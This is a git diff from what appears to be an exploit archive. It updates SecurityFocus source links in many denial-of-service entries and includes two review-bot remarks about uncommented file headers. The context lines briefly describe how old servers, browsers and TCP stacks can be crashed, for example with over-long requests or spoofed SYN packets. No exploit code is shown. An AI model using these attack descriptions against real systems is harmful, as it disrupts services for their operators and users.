program which is deployable across an entire network. During the installation of the management software, the administrator is asked to choose between managing from a webserver or from a fileserver. If the webserver option is chosen, clients running OfficeScan are configured to listen to port 12345 in order to receive periodical database engine updates and other administrative commands from the OfficeScan manager. diff --git a/exploits/multiple/dos/19920.c b/exploits/multiple/dos/19920.c index 94869b704..c6ffc220c 100644 --- a/exploits/multiple/dos/19920.c +++ b/exploits/multiple/dos/19920.c 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1213/info +// source: https://www.securityfocus.com/bid/1213/info A buffer overflow DoS vulnerability exists in CProxy Server 3.3 Service Pack 2 diff --git a/exploits/multiple/dos/19965.txt b/exploits/multiple/dos/19965.txt index 6b83cdeba..777c6f88f 100644 --- a/exploits/multiple/dos/19965.txt +++ b/exploits/multiple/dos/19965.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1246/info +source: https://www.securityfocus.com/bid/1246/info By default JetAdmin Web Interface Server listens on port 8000. If a malformed URL request is sent to port 8000 this will cause the server services to stop responding. The service must be stopped and restarted to regain normal functionality. diff --git a/exploits/multiple/dos/19977.txt b/exploits/multiple/dos/19977.txt index d35f626c2..7581128ba 100644 --- a/exploits/multiple/dos/19977.txt +++ b/exploits/multiple/dos/19977.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1288/info +source: https://www.securityfocus.com/bid/1288/info RealServer 7.0 will crash if it receives a request for a specific file with an unspecified variable value. diff --git a/exploits/multiple/dos/19984.c b/exploits/multiple/dos/19984.c index ef74df75d..1a93fd742 100644 --- a/exploits/multiple/dos/19984.c +++ b/exploits/multiple/dos/19984.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1298/info +// source: https://www.securityfocus.com/bid/1298/info xterm is a popular X11-based terminal emulator. If VT control-characters are displayed in the xterm, they can be interpreted and used to cause a denial of service attack against the client (and even the host running the client). What makes it possible for remote users to exploit this vulnerability is a situation like this: diff --git a/exploits/multiple/dos/19996.txt b/exploits/multiple/dos/19996.txt index fb5fef990..28f7204ce 100644 --- a/exploits/multiple/dos/19996.txt +++ b/exploits/multiple/dos/19996.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1314/info +source: https://www.securityfocus.com/bid/1314/info Due to a faulty mechanism in the password parsing implementation in authentication requests, it is possible to launch a denial of service attack against Allaire ColdFusion 4.5.1 or previous by inputting a string of over 40 000 characters to the password field in the Administrator login page. CPU utilization could reach up to 100%, bringing the program to halt. The default form for the login page would prevent such an attack. However, a malicious user could download the form locally to their hard drive, modify HTML tag fields, and be able to submit the 40 000 character string to the ColdFusion Server. diff --git a/exploits/multiple/dos/20052.txt b/exploits/multiple/dos/20052.txt index c3f25ad5b..3d886a5f5 100644 --- a/exploits/multiple/dos/20052.txt +++ b/exploits/multiple/dos/20052.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1421/info +source: https://www.securityfocus.com/bid/1421/info If an E-mail containing an excessively long To: field in the header (~1.5 MB) is processed by First Class Intranet Services (FCIS), a Denial of Service can occur. diff --git a/exploits/multiple/dos/20098.txt b/exploits/multiple/dos/20098.txt index 1b3a79553..82d0ec691 100644 --- a/exploits/multiple/dos/20098.txt +++ b/exploits/multiple/dos/20098.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1503/info +source: https://www.securityfocus.com/bid/1503/info Netscape Browsers use the Independent JPEG Group's decoder library to process JPEG encoded images. The library functions skip JPEG comments; however, the browser uses a custom function to process these comments and store them in memory. The comment includes a 2-byte "length" field which indicates how long the comment is - this value includes the 2-bytes of the "length" field. To determine the length of the comment string alone (for memory allocation), the function reads the value in the "length" field and subtracts two. The function then allocates the length of the comment + one byte for NULL termination. There is no error checking to ensure the "length" value is valid. This makes it possible to cause an overflow by creating an image with a comment "length" field containing the value 1. The memory allocation call of 0 bytes (1 minus 2 (length field) + 1 (null termination)) will succeed. The calculated comment size variable is declared unsigned, resulting in a large positive value (from 1 minus 2). The comment handling function goes into a loop to read the comment into memory, but since the calculated comment size is enormous this causes the function to read the entire JPEG stream, overwriting the heap. It is theoretically possible to exploit this to execute arbitrary code. The browser, mail and news readers are all vulnerable to this. diff --git a/exploits/multiple/dos/20178.pl b/exploits/multiple/dos/20178.pl index 4be5a4bb0..535a5ede8 100755 --- a/exploits/multiple/dos/20178.pl +++ b/exploits/multiple/dos/20178.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1610/info +source: https://www.securityfocus.com/bid/1610/info vqServer 1.4.49 is subject to a buffer overflow. If a GET request is sent to the server containing 65 000 characters the server will stop responding. A reboot is required in order to gain normal functionality. 
diff --git a/exploits/multiple/dos/20229.txt b/exploits/multiple/dos/20229.txt index b3408cf5c..ad41ee1e0 100644 --- a/exploits/multiple/dos/20229.txt +++ b/exploits/multiple/dos/20229.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1691/info +source: https://www.securityfocus.com/bid/1691/info Large amounts of data (ie 1092+ characters) in the Host: request header may cause the web server process to fault on signal 11 (SIGSEGV) or signal 10 (SIGBUS). diff --git a/exploits/multiple/dos/20239.txt b/exploits/multiple/dos/20239.txt index 98c25a1ea..864d88fe7 100644 --- a/exploits/multiple/dos/20239.txt +++ b/exploits/multiple/dos/20239.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1713/info +source: https://www.securityfocus.com/bid/1713/info The OverView5 CGI interface by default is shipped with HP Openview Node Manager. diff --git a/exploits/multiple/dos/20336.txt b/exploits/multiple/dos/20336.txt index a77abf3da..a9844e048 100644 --- a/exploits/multiple/dos/20336.txt +++ b/exploits/multiple/dos/20336.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1868/info +source: https://www.securityfocus.com/bid/1868/info Unify eWave ServletExec is a Java/Java Servlet engine plug-in for major web servers such as Microsoft IIS, Apache, Netscape Enterprise Server, etc. diff --git a/exploits/multiple/dos/20531.txt b/exploits/multiple/dos/20531.txt index 9d62a0d25..d0b697fb5 100644 --- a/exploits/multiple/dos/20531.txt +++ b/exploits/multiple/dos/20531.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/2175/info +source: https://www.securityfocus.com/bid/2175/info IBM HTTP Server contains AfpaCache directive which turns the Fast Response Cache Accelerator function on or off. WebSphere is a series of applications which are built upon IBM HTTP Server. diff --git a/exploits/multiple/dos/20534.txt b/exploits/multiple/dos/20534.txt index 02db1b323..ae3fb19af 100644 --- a/exploits/multiple/dos/20534.txt 
+++ b/exploits/multiple/dos/20534.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/2178/info +source: https://www.securityfocus.com/bid/2178/info WebMaster ConferenceRoom Developer Edition is a chat package which enables a large community of users to chat together. ConferenceRoom has a wide range of capabilities and a user friendly channel moderation feature. diff --git a/exploits/multiple/dos/20558.txt b/exploits/multiple/dos/20558.txt index 0deb45af1..2b03038f7 100644 --- a/exploits/multiple/dos/20558.txt +++ b/exploits/multiple/dos/20558.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/2216/info +source: https://www.securityfocus.com/bid/2216/info Apache Web Server 1.2 and previous versions are subject to a denial of service. By requesting a malformed GET request composed of an unusually large number of '/' characters, an attacker can cause CPU usage to spike. A restart of the service is required to gain normal functionality. diff --git a/exploits/multiple/dos/20610.txt b/exploits/multiple/dos/20610.txt index de68e76ea..e63406419 100644 --- a/exploits/multiple/dos/20610.txt +++ b/exploits/multiple/dos/20610.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/2337/info +source: https://www.securityfocus.com/bid/2337/info A denial of service condition exists in the JRun web application server. Requesting multiple malformed URLs by way of the java servlet, will cause the JRun application server to stop responding. diff --git a/exploits/multiple/dos/20659.txt b/exploits/multiple/dos/20659.txt index 997bf39d1..3e9168848 100644 --- a/exploits/multiple/dos/20659.txt +++ b/exploits/multiple/dos/20659.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/2442/info +source: https://www.securityfocus.com/bid/2442/info SurgeFTP is a FTP Server distributed and maintained by Netwin. SurgeFTP is a configurable, easily maintained ftp server, functional on both the UNIX and Windows platforms. 
diff --git a/exploits/multiple/dos/20792.txt b/exploits/multiple/dos/20792.txt index 034a52eb9..695b35bfc 100644 --- a/exploits/multiple/dos/20792.txt +++ b/exploits/multiple/dos/20792.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/2641/info +source: https://www.securityfocus.com/bid/2641/info Mercury MTA is a mail-transfer agent available for Novell NetWare and Windows NT. Novell versions of the Mercury POP3 server prior to 1.48 are vulnerable to a buffer overflow caused by inadequate string handling for the APOP authentication command. diff --git a/exploits/multiple/dos/20810.c b/exploits/multiple/dos/20810.c index b64617416..476a0ff51 100644 --- a/exploits/multiple/dos/20810.c +++ b/exploits/multiple/dos/20810.c @@ -1,5 +1,5 @@ /* -source: http://www.securityfocus.com/bid/2666/info +source: https://www.securityfocus.com/bid/2666/info A number of TCP/IP stacks are vulnerable to a "loopback" condition initiated by sending a TCP SYN packet with the source address and port spoofed to equal the destination source and port. When a packet of this sort is received, an infinite loop is initiated and the affected system halts. This is known to affect Windows 95, Windows NT 4.0 up to SP3, Windows Server 2003, Windows XP SP2, Cisco IOS devices & Catalyst switches, and HP-UX up to 11.00. diff --git a/exploits/multiple/dos/20811.cpp b/exploits/multiple/dos/20811.cpp index a2cd80bba..0c573bbfa 100644 --- a/exploits/multiple/dos/20811.cpp +++ b/exploits/multiple/dos/20811.cpp 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/2666/info +source: https://www.securityfocus.com/bid/2666/info A number of TCP/IP stacks are vulnerable to a "loopback" condition initiated by sending a TCP SYN packet with the source address and port spoofed to equal the destination source and port. When a packet of this sort is received, an infinite loop is initiated and the affected system halts. This is known to affect Windows 95, Windows NT 4.0 up to SP3, Windows Server 2003, Windows XP SP2, Cisco IOS devices & Catalyst switches, and HP-UX up to 11.00. diff --git a/exploits/multiple/dos/20813.c b/exploits/multiple/dos/20813.c index 4155046e4..8286e40ba 100644 --- a/exploits/multiple/dos/20813.c +++ b/exploits/multiple/dos/20813.c @@ -1,5 +1,5 @@ /* -source: http://www.securityfocus.com/bid/2666/info +source: https://www.securityfocus.com/bid/2666/info A number of TCP/IP stacks are vulnerable to a "loopback" condition initiated by sending a TCP SYN packet with the source address and port spoofed to equal the destination source and port. When a packet of this sort is received, an infinite loop is initiated and the affected system halts. This is known to affect Windows 95, Windows NT 4.0 up to SP3, Windows Server 2003, Windows XP SP2, Cisco IOS devices & Catalyst switches, and HP-UX up to 11.00. diff --git a/exploits/multiple/dos/20827.pl b/exploits/multiple/dos/20827.pl index ccf2b9854..8146b4d7c 100755 --- a/exploits/multiple/dos/20827.pl +++ b/exploits/multiple/dos/20827.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/2700/info +source: https://www.securityfocus.com/bid/2700/info It is possible for a remote user to cause a denial of service on a host running DSL_Vdns. Submitting data to port 6070 and closing the connection before the request is fulfilled, will cause DSL_Vdns to enter a 'Default.Closed' state; therefore, refusing any new connections. 
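Review bot: In 20827.pl the replaced first line is still bare text (`source: https://www.securityfocus.com/bid/2700/info`) in a file whose mode is 100755, so an executable Perl script opens with a line that is not a comment, and the unchanged description line after it is uncommented as well. Since this hunk already rewrites the header line, prefix it with `#` and comment out the description too, in the same spirit as the `//` prefix this patch gives the `source:` line in 21012.c and other .c files.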
diff --git a/exploits/multiple/dos/20852.pl b/exploits/multiple/dos/20852.pl index fea24ebfc..fc4b02fb0 100755 --- a/exploits/multiple/dos/20852.pl +++ b/exploits/multiple/dos/20852.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/2732/info +source: https://www.securityfocus.com/bid/2732/info iPlanet Webserver is an http server product offered by the Sun-Netscape Alliance. diff --git a/exploits/multiple/dos/20853.php b/exploits/multiple/dos/20853.php index 713369044..2d96cffb5 100644 --- a/exploits/multiple/dos/20853.php +++ b/exploits/multiple/dos/20853.php @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/2732/info +source: https://www.securityfocus.com/bid/2732/info iPlanet Webserver is an http server product offered by the Sun-Netscape Alliance. diff --git a/exploits/multiple/dos/20973.txt b/exploits/multiple/dos/20973.txt index 484538ef7..792d61458 100644 --- a/exploits/multiple/dos/20973.txt +++ b/exploits/multiple/dos/20973.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/2933/info +source: https://www.securityfocus.com/bid/2933/info Icecast is an open source audio-streaming server for both Unix and Microsoft Windows systems. diff --git a/exploits/multiple/dos/20997.c b/exploits/multiple/dos/20997.c index 25f627442..c22d13b47 100644 --- a/exploits/multiple/dos/20997.c +++ b/exploits/multiple/dos/20997.c @@ -1,5 +1,5 @@ /* -source: http://www.securityfocus.com/bid/2997/info +source: https://www.securityfocus.com/bid/2997/info A potential denial of service vulnerability exists in several TCP stack implementations. diff --git a/exploits/multiple/dos/21012.c b/exploits/multiple/dos/21012.c index 74dd73690..4e4a41255 100644 --- a/exploits/multiple/dos/21012.c +++ b/exploits/multiple/dos/21012.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/3051/info +// source: https://www.securityfocus.com/bid/3051/info Quake is a very popular 3D "first-person-shooter" game from ID software. 
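Review bot: In 21012.c only the `source:` line gains a `//` prefix; the context line that follows it ("Quake is a very popular 3D ...") stays as bare prose. The hunk starts at line 1, so no comment is open above it, the header is only partly commented, and the file still does not begin with valid C. Wrap the whole description in a block comment, as 20997.c in the hunk just above does with its leading `/*`, rather than prefixing a single line.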
diff --git a/exploits/multiple/dos/21041.txt b/exploits/multiple/dos/21041.txt index 8639c3884..f56a89e75 100644 --- a/exploits/multiple/dos/21041.txt +++ b/exploits/multiple/dos/21041.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/3122/info +source: https://www.securityfocus.com/bid/3122/info An issue which affects users of multiple web browsers on Microsoft Windows platforms has been discovered. diff --git a/exploits/multiple/dos/21042.txt b/exploits/multiple/dos/21042.txt index 6ca12ad6c..df4cfc1ed 100644 --- a/exploits/multiple/dos/21042.txt +++ b/exploits/multiple/dos/21042.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/3123/info +source: https://www.securityfocus.com/bid/3123/info Quake3 Arena Server is a software package designed to host multiple Quake 3 players over a network for interactive play. diff --git a/exploits/multiple/dos/21126.c b/exploits/multiple/dos/21126.c index 78545cbdb..76b350b5d 100644 --- a/exploits/multiple/dos/21126.c +++ b/exploits/multiple/dos/21126.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/3467/info +// source: https://www.securityfocus.com/bid/3467/info 6tunnel is a freely available, open source software package designed to provide IPv6 functionality to hosts that do not comply with the standard. It works by creating IPv6 tunnels. diff --git a/exploits/multiple/dos/21181.txt b/exploits/multiple/dos/21181.txt index c74375c78..5ef0d5088 100644 --- a/exploits/multiple/dos/21181.txt +++ b/exploits/multiple/dos/21181.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/3684/info +source: https://www.securityfocus.com/bid/3684/info An issue which affects users of multiple web browsers on Microsoft Windows platforms has been discovered. diff --git a/exploits/multiple/dos/21213.txt b/exploits/multiple/dos/21213.txt index f127a6807..c438c6be9 100644 --- a/exploits/multiple/dos/21213.txt +++ b/exploits/multiple/dos/21213.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/3849/info +source: https://www.securityfocus.com/bid/3849/info Snort is a network intrusion detection system (IDS). It is originally written for Linux and Unix systems, although it has also been ported to run under Microsoft Windows. Snort is capable of flexible and powerful content analysis of network traffic, and can detect a large number of attack attempts. diff --git a/exploits/multiple/dos/21232.c b/exploits/multiple/dos/21232.c index 4499025d5..9fae84446 100644 --- a/exploits/multiple/dos/21232.c +++ b/exploits/multiple/dos/21232.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/3903/info +// source: https://www.securityfocus.com/bid/3903/info Oracle 8i is an enterprise level database solution. It is available on a wide variety of platforms, including many Unix operating systems. diff --git a/exploits/multiple/dos/21337.c b/exploits/multiple/dos/21337.c index 8345a8279..d158591c5 100644 --- a/exploits/multiple/dos/21337.c +++ b/exploits/multiple/dos/21337.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/4258/info +// source: https://www.securityfocus.com/bid/4258/info Menasoft SPHEREserver .99 is an online role playing game server. It is vulnerable to a denial of service; multiple connections to the server can be made from a single machine, exhausting available connections and denying connections to legitimate users. diff --git a/exploits/multiple/dos/21379.pl b/exploits/multiple/dos/21379.pl index f58d11e21..4d3550b73 100755 --- a/exploits/multiple/dos/21379.pl +++ b/exploits/multiple/dos/21379.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/4508/info +source: https://www.securityfocus.com/bid/4508/info Melange Chat System is a chat server program developed by Christian Walter. Currently support for this application is no longer available. diff --git a/exploits/multiple/dos/21413.txt b/exploits/multiple/dos/21413.txt index b4c6475e1..d2e288054 100644 
--- a/exploits/multiple/dos/21413.txt +++ b/exploits/multiple/dos/21413.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/4577/info +source: https://www.securityfocus.com/bid/4577/info A vulnerability has been reported in some versions of National Instruments LabVIEW for Linux and Microsoft Windows. diff --git a/exploits/multiple/dos/21539.c b/exploits/multiple/dos/21539.c index 5b8b4ad1c..25d5156a1 100644 --- a/exploits/multiple/dos/21539.c +++ b/exploits/multiple/dos/21539.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/5002/info +// source: https://www.securityfocus.com/bid/5002/info The Netscape Communicator and Mozilla browsers include support for email, and the ability to fetch mail through a POP3 server. Both products are available for a range of platforms, including Microsoft Windows and Linux. diff --git a/exploits/multiple/dos/21544.html b/exploits/multiple/dos/21544.html index 2f1ba083c..ae46d985f 100644 --- a/exploits/multiple/dos/21544.html +++ b/exploits/multiple/dos/21544.html @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/5010/info +source: https://www.securityfocus.com/bid/5010/info Netscape is a freely available web browser distributed by Netscape Communications, and available for various platforms. This vulnerability is known to affect those installations on the Linux platform. diff --git a/exploits/multiple/dos/21572.txt b/exploits/multiple/dos/21572.txt index c663abd7c..c240fcf19 100644 --- a/exploits/multiple/dos/21572.txt +++ b/exploits/multiple/dos/21572.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/5076/info +source: https://www.securityfocus.com/bid/5076/info Half-Life is a popular game distributed and maintained by Valve Software. It includes features that allow users to game locally, or in distributed network environments. Valve Software also distributes a dedicated server product. 
diff --git a/exploits/multiple/dos/21575.txt b/exploits/multiple/dos/21575.txt index ef8c49f69..855d649c8 100644 --- a/exploits/multiple/dos/21575.txt +++ b/exploits/multiple/dos/21575.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/5084/info +source: https://www.securityfocus.com/bid/5084/info An off-by-one issue exists in mod_ssl that affects Apache when handling certain types of long entries in an .htaccess file. Though this capability within the web server is not enabled by default, it is popular as it allows non-privileged users to create web access control schemes for hosted sites, and is enabled through the "AllowOverride" configuration variable in Apache. A .htaccess file with 10000 or more bytes set into the variable DATE_LOCALE will result in a buffer overflow within the web server process handling the request. diff --git a/exploits/multiple/dos/21593.txt b/exploits/multiple/dos/21593.txt index 3f515830d..72ce91c2a 100644 --- a/exploits/multiple/dos/21593.txt +++ b/exploits/multiple/dos/21593.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/5148/info +source: https://www.securityfocus.com/bid/5148/info Unreal Tournament is a game produced by Epic Games, available for Microsoft Windows and Linux. Network play is supported. A vulnerability has been reported in the server used for network play. diff --git a/exploits/multiple/dos/21782.txt b/exploits/multiple/dos/21782.txt index b1169ef77..0895e1af1 100644 --- a/exploits/multiple/dos/21782.txt +++ b/exploits/multiple/dos/21782.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/5678/info +source: https://www.securityfocus.com/bid/5678/info The Oracle TNS Listener program is a remote connectivity service for Oracle Databases. diff --git a/exploits/multiple/dos/21911.txt b/exploits/multiple/dos/21911.txt index 6f67f1163..5952cb858 100644 --- a/exploits/multiple/dos/21911.txt +++ b/exploits/multiple/dos/21911.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/5902/info +source: https://www.securityfocus.com/bid/5902/info Oracle 9i Application Server (9iAS) allows remote administration via a web access module. This vulnerability affects Oracle 9iAS running on Microsoft Windows. diff --git a/exploits/multiple/dos/22010.txt b/exploits/multiple/dos/22010.txt index d9c33ed43..d3aa0745e 100644 --- a/exploits/multiple/dos/22010.txt +++ b/exploits/multiple/dos/22010.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6156/info +source: https://www.securityfocus.com/bid/6156/info A buffer overflow vulnerability has been reported for the Hotfoon dialer. The vulnerability exists in a text input field for dialing telephone numbers. Reportedly, Hotfoon4.exe does not adequately perform boundary checks on this field. diff --git a/exploits/multiple/dos/22053.txt b/exploits/multiple/dos/22053.txt index b9697e54d..c26d238f7 100644 --- a/exploits/multiple/dos/22053.txt +++ b/exploits/multiple/dos/22053.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6277/info +source: https://www.securityfocus.com/bid/6277/info A buffer overflow vulnerability has been reported for Moby NetSuite that may result in a denial of service condition. Reportedly, it is possible to cause NetSuite to crash when a malformed POST request is received. diff --git a/exploits/multiple/dos/22207.txt b/exploits/multiple/dos/22207.txt index 47c5b9d33..a2f10834c 100644 --- a/exploits/multiple/dos/22207.txt +++ b/exploits/multiple/dos/22207.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6734/info +source: https://www.securityfocus.com/bid/6734/info A denial of service condition has been reported in 3ware's Disk Management (3DM) by sending a malformed HTTP request to port 1080. diff --git a/exploits/multiple/dos/22223.txt b/exploits/multiple/dos/22223.txt index 61aace301..f17d3ef1e 100644 --- a/exploits/multiple/dos/22223.txt +++ b/exploits/multiple/dos/22223.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6774/info +source: https://www.securityfocus.com/bid/6774/info t has been reported that a memory corruption bug exists in games based on the Unreal Engine. Under some circumstances, when the game client connects to a server using a excessive length Unreal URL it may be possible for the malformed URL to write over sensitive areas of stack memory causing the client to crash. diff --git a/exploits/multiple/dos/22230.pl b/exploits/multiple/dos/22230.pl index e4c390a65..5ea06fb7a 100755 --- a/exploits/multiple/dos/22230.pl +++ b/exploits/multiple/dos/22230.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6792/info +source: https://www.securityfocus.com/bid/6792/info It has been reported that iPlanet Web Server and Netscape Enterprise Server are prone to a remotely exploitable buffer overflow condition. This is due to insufficient bounds checking when handling HTTP requests. diff --git a/exploits/multiple/dos/22250.sh b/exploits/multiple/dos/22250.sh index 955f98927..45b6b00a6 100755 --- a/exploits/multiple/dos/22250.sh +++ b/exploits/multiple/dos/22250.sh @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6844/info +source: https://www.securityfocus.com/bid/6844/info A buffer overflow condition has been discovered in the Intel iParty server. diff --git a/exploits/multiple/dos/22345.txt b/exploits/multiple/dos/22345.txt index 043ea1b25..43e08ee41 100644 --- a/exploits/multiple/dos/22345.txt +++ b/exploits/multiple/dos/22345.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7067/info +source: https://www.securityfocus.com/bid/7067/info A vulnerability has been discovered in Multitech RouteFinder 550 VPN firmware release 4.63 and earlier. The problem occurs due to insufficient bounds checking of data supplied in HTTP GET requests. By passing excessive data to the device it may be possible for a remote attacker to corrupt memory. 
diff --git a/exploits/multiple/dos/22358.cfm b/exploits/multiple/dos/22358.cfm index 656b75ed2..f8a180c0c 100644 --- a/exploits/multiple/dos/22358.cfm +++ b/exploits/multiple/dos/22358.cfm @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7109/info +source: https://www.securityfocus.com/bid/7109/info Several implementations of the Java Virtual Machine have been reported to be prone to a denial of service condition. This vulnerability occurs in several methods in the java.util.zip class. diff --git a/exploits/multiple/dos/22359.xsl b/exploits/multiple/dos/22359.xsl index 3e4f4d41b..d7dbe7e50 100644 --- a/exploits/multiple/dos/22359.xsl +++ b/exploits/multiple/dos/22359.xsl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7109/info +source: https://www.securityfocus.com/bid/7109/info Several implementations of the Java Virtual Machine have been reported to be prone to a denial of service condition. This vulnerability occurs in several methods in the java.util.zip class. diff --git a/exploits/multiple/dos/22360.java b/exploits/multiple/dos/22360.java index ca6fe0696..2925a699f 100644 --- a/exploits/multiple/dos/22360.java +++ b/exploits/multiple/dos/22360.java @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7109/info +source: https://www.securityfocus.com/bid/7109/info Several implementations of the Java Virtual Machine have been reported to be prone to a denial of service condition. This vulnerability occurs in several methods in the java.util.zip class. diff --git a/exploits/multiple/dos/22441.txt b/exploits/multiple/dos/22441.txt index ac6fdd0a5..d3954d666 100644 --- a/exploits/multiple/dos/22441.txt +++ b/exploits/multiple/dos/22441.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7227/info +source: https://www.securityfocus.com/bid/7227/info A denial-of-service vulnerability has been reported to affect several browsers. The vulnerability occurs when executing certain malformed JavaScript-enabled pages. 
diff --git a/exploits/multiple/dos/22502.pl b/exploits/multiple/dos/22502.pl index 1037346b6..1e2ca10a4 100755 --- a/exploits/multiple/dos/22502.pl +++ b/exploits/multiple/dos/22502.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7368/info +source: https://www.securityfocus.com/bid/7368/info It has been reported that TW-WebServer is prone to a denial of service vulnerability. Reportedly when an excessive quantity of data is sent to the TW-Webserver as part of a malicious HTTP GET request the server will fail. diff --git a/exploits/multiple/dos/22503.c b/exploits/multiple/dos/22503.c index 337890a58..7868681da 100644 --- a/exploits/multiple/dos/22503.c +++ b/exploits/multiple/dos/22503.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7368/info +// source: https://www.securityfocus.com/bid/7368/info It has been reported that TW-WebServer is prone to a denial of service vulnerability. Reportedly when an excessive quantity of data is sent to the TW-Webserver as part of a malicious HTTP GET request the server will fail. diff --git a/exploits/multiple/dos/22505.txt b/exploits/multiple/dos/22505.txt index d970bdf1a..3b2093fc4 100644 --- a/exploits/multiple/dos/22505.txt +++ b/exploits/multiple/dos/22505.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7375/info +source: https://www.securityfocus.com/bid/7375/info A vulnerability has been reported for the mod_access_referer Apache module. The problem occurs when parsing invalid HTTP referer header fields. If this vulnerability were to be triggered, it may be possible to trigger a NULL pointer dereference, effectively causing Apache to segfault. diff --git a/exploits/multiple/dos/22512.txt b/exploits/multiple/dos/22512.txt index d410b31e2..5bcfcd33f 100644 --- a/exploits/multiple/dos/22512.txt +++ b/exploits/multiple/dos/22512.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7388/info +source: https://www.securityfocus.com/bid/7388/info The mod_ntlm Apache module has been reported prone to a heap overflow vulnerability. diff --git a/exploits/multiple/dos/22514.txt b/exploits/multiple/dos/22514.txt index 12d1bcc8d..5f5484b80 100644 --- a/exploits/multiple/dos/22514.txt +++ b/exploits/multiple/dos/22514.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7393/info +source: https://www.securityfocus.com/bid/7393/info A format string vulnerability has been reported for the mod_ntlm Apache module. The problem occurs when logging authentication strings passed in HTTP requests. By passing malicious format specifiers in a request, it may be possibile for an attacker to corrupt sensitive locations in memory. This may result in a denial of service or under certain circumstances could allow an attacker to execute arbitrary code. diff --git a/exploits/multiple/dos/22535.txt b/exploits/multiple/dos/22535.txt index 5538c0114..f5ef04776 100644 --- a/exploits/multiple/dos/22535.txt +++ b/exploits/multiple/dos/22535.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7428/info +source: https://www.securityfocus.com/bid/7428/info A denial of service vulnerability has been discovered in VisNetic ActiveDefense. The problem occurs when multiple HTTP requests are subsequently made to a server, containing a specific amount of data. After processing these requests, the affected system will crash. diff --git a/exploits/multiple/dos/22536.txt b/exploits/multiple/dos/22536.txt index dfee9c53f..1d316c308 100644 --- a/exploits/multiple/dos/22536.txt +++ b/exploits/multiple/dos/22536.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7430/info +source: https://www.securityfocus.com/bid/7430/info Allegedly, a vulnerability exists in Opera 7.10 that may result in a denial of service. The problem reportedly occurs when processing a 'news:' URL of excessive length. It has been reported that this issue will trigger a condition that will prevent Opera from functioning until the program has been reinstalled. diff --git a/exploits/multiple/dos/22634.txt b/exploits/multiple/dos/22634.txt index 21478a166..ae6061026 100644 --- a/exploits/multiple/dos/22634.txt +++ b/exploits/multiple/dos/22634.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7664/info +source: https://www.securityfocus.com/bid/7664/info Nessus has reported that various flaws have been discovered in the 'libnasl' library used by the Nessus application. As a result, a malicious NASL script may be able to break outside of the established sandbox environment and execute arbitrary commands on the local system. diff --git a/exploits/multiple/dos/22650.py b/exploits/multiple/dos/22650.py index a867e6023..45a5eb43a 100755 --- a/exploits/multiple/dos/22650.py +++ b/exploits/multiple/dos/22650.py @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7695/info +source: https://www.securityfocus.com/bid/7695/info When WebWeaver receives unusually long POST or HEAD requests, a denial of service condition may result. Restarting WebWeaver will allow normal operation to resume. diff --git 